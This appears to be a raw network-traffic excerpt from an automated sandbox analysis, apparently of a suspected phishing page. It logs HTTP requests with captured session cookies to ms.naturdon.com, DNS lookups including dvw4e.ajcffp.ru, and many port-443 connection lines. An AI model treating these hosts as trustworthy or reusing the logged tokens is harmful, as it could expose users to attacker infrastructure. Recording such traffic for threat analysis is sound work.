XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /kllxu00N4Zd9GBpMkPRMJL6O3OU3at2FPw9cdgaD3BCq4jMfqcRJkHAx156168 HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /qrmZhkmVs3lGM0Q2sgvoqCHgFfVy0uvbecffP7e0dWCi1FNiavl0Ms6yef238 HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ghN0n6xyqF79DUkCI7M5jl9tDKtEGk7pgxypCNYtBFhWI8elPUjiKnPef204 HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /stjXGvT17JklTv4LfDUGVIPdaYnFaQdUW4jCMkD3HbMhZoqA0Z67SnPrMnOwyyOYBACmgPHP6wGVVWZbZOviWBaoaGgh254 HTTP/1.1Host: ms.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlJSR1BVR25PcnhBMXYraXg3aHF6L2c9PSIsInZhbHVlIjoiT2JjNFFMSWFzVUswOUk3bzExcENoZW0wZWNrTjdSNWRGczN1dWl1M3FVN0IxeEFnb1VNMWh5Q2VOUTFJQnppZ1poUGdCMytSRXN2VXpvSVBvRnk0TUUrU203ZjJzdUFDeUF3Z0dPNVYxcmRrdG1IL3Q4Um4zZGM4c3ZyOEs5VGkiLCJtYWMiOiJmZjliOTVjMjY1MzBiMTIyODI1Njc1MzE1MzQ2OWJiZDM3N2UwYTZhMjMwNTIxYjYyNTJmZDQzOTViZWMyOTM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhYWENGblpGakpzVmZ1RGZXaEczU1E9PSIsInZhbHVlIjoib01YampiZncrdDNJU21mRnRpTDEwYXozOU9PNzZKN0M3eWJFUkpVWHp3WFFOY2xTeVRqa2RpM3g3eUV4Vi9PTWU3WU1qdnlJMjFIS3g2TDBDTTBsazlmNGhHQWRzTGFwVHErZzl0TlZCNXBkeGJ3ODBVcHVWMVE5M1hVSWgwL1IiLCJtYWMiOiIxZmRlOTcyN2M5OGQ1ZWI4MWQzYTNkZDQ5MGRlZWYxYzA5Y2Y3MGVlMDBjMWM2NjljYjBhYTA3OTYxMjE3OTRlIiwidGFnIjoiIn0%3D
              Source: global trafficDNS traffic detected: DNS query: app.heptabase.com
              Source: global trafficDNS traffic detected: DNS query: get.heptabase.com
              Source: global trafficDNS traffic detected: DNS query: partnerlinks.io
              Source: global trafficDNS traffic detected: DNS query: grsm.io
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: o1198943.ingest.sentry.io
              Source: global trafficDNS traffic detected: DNS query: cdn.segment.com
              Source: global trafficDNS traffic detected: DNS query: featureassets.org
              Source: global trafficDNS traffic detected: DNS query: api.heptabase.com
              Source: global trafficDNS traffic detected: DNS query: widget.intercom.io
              Source: global trafficDNS traffic detected: DNS query: js.intercomcdn.com
              Source: global trafficDNS traffic detected: DNS query: heptabase-hepta-file.s3.us-west-1.amazonaws.com
              Source: global trafficDNS traffic detected: DNS query: prodregistryv2.org
              Source: global trafficDNS traffic detected: DNS query: ms.naturdon.com
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: dvw4e.ajcffp.ru
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: github.com
              Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
              Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
              Source: unknownHTTP traffic detected: POST /api/6321418/envelope/?sentry_key=00289ace08a54d5fb367f421faa5b69f&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.92.0 HTTP/1.1Host: o1198943.ingest.sentry.ioConnection: keep-aliveContent-Length: 468sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8sec-ch-ua-mobile: ?0Accept: */*Origin: https://app.heptabase.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.heptabase.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 24 Mar 2025 17:24:45 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenreferrer-policy: strict-origin-when-cross-originx-content-type-options: nosniffx-statsig-region: gke-us-east5Content-Length: 19content-type: text/plaindate: Mon, 24 Mar 2025 17:24:45 GMTset-cookie: GCLB="3bd031499ba5a558"; Max-Age=1; Path=/; HttpOnlyvia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 17:24:50 GMTContent-Type: text/html; charset=utf-8Content-Length: 170Connection: closeSet-Cookie: AWSALB=/ltkQUIPui8qpKc+BxAisERK/Mj7H/OOzw8jLAHB6qVHZjRZOCWxewPv8X7hq2JTiTm6mVcESdzuIgs5C8VuCVxajp8nLogVmwf6glYS+mBehPBevolsz88PZRQ8; Expires=Mon, 31 Mar 2025 17:24:50 GMT; Path=/Set-Cookie: AWSALBCORS=/ltkQUIPui8qpKc+BxAisERK/Mj7H/OOzw8jLAHB6qVHZjRZOCWxewPv8X7hq2JTiTm6mVcESdzuIgs5C8VuCVxajp8nLogVmwf6glYS+mBehPBevolsz88PZRQ8; Expires=Mon, 31 Mar 2025 17:24:50 GMT; Path=/; SameSite=None; SecureVary: OriginContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniff
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 17:24:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z0bIX6fAG7Sui09ZowbDpGYxvtHKUYKHgk1uBFJ%2FZhI7kjtN00uw%2BU2h4d87NmhK23O0yQdu4OsmPWFtsUjxJK6dadDvE4GGyNzcrZHbZsktaPaIBDEMucEbomBY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=39897&min_rtt=39878&rtt_var=14968&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2293&delivery_rate=71417&cwnd=99&unsent_bytes=0&cid=296e6e95e5eace88&ts=238&x=0"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 109Server: cloudflareCF-RAY: 9257dd758cd1de9c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=105038&min_rtt=104670&rtt_var=22676&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1893&delivery_rate=35078&cwnd=247&unsent_bytes=0&cid=00767489e0498a9f&ts=2331&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 17:25:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GqMpMEMqKZo4qetdo1e0pgrgkKsknhIYU50dX7ls4nrUo2d6zanacGelW4qOlNuy0Nnst484WAEJ2gUmC5aCyDjMERrq0%2ByMtz21EIHYBOrJHtZfoM%2FXJCF1fnqP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=42921&min_rtt=42852&rtt_var=16119&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2040&delivery_rate=66461&cwnd=108&unsent_bytes=0&cid=128354ac8d6af412&ts=257&x=0"Server: cloudflareCF-RAY: 9257ddb6edd932b1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=108943&min_rtt=105049&rtt_var=26248&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1708&delivery_rate=35451&cwnd=241&unsent_bytes=0&cid=704cba8a430374ac&ts=690&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 17:25:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JFlnx9E2P038xG8x2SBj2JEgIwd1eYIXOTwdb83mATLzdhjnhSA7aFsuiGkfZQSlX%2FaYtrDkJeQ15JszizU%2BkSx5bH3ddxUJbEt9vgoSSEclqM7ypfmLtFUPkCkV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=40325&min_rtt=40324&rtt_var=15125&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2053&delivery_rate=70601&cwnd=77&unsent_bytes=0&cid=6873e1d64104f050&ts=247&x=0"Server: cloudflareCF-RAY: 9257ddc3fe33c540-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=103898&min_rtt=103723&rtt_var=22055&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1720&delivery_rate=35916&cwnd=231&unsent_bytes=0&cid=cf978230842e27e5&ts=666&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 17:25:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Zkxs31%2F%2FUouNE1O7hhlhH8V5cQAi2o4KeeFQHKL6nYshtk%2FdQg26lIEbkpiUWcozhXpMcioB3RTG5YICtpYtkRhxeNTnkvXCdqQAvALa0XoVJkae%2BArhuEAFTxK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=37744&min_rtt=37738&rtt_var=14156&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2054&delivery_rate=75467&cwnd=86&unsent_bytes=0&cid=004c48ee9eebff27&ts=226&x=0"Server: cloudflareCF-RAY: 9257ddd8bc32f3ba-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=108673&min_rtt=107083&rtt_var=23957&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1722&delivery_rate=34634&cwnd=206&unsent_bytes=0&cid=cf19e02f171abed2&ts=634&x=0"
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
              Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
              Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
              Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
              Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
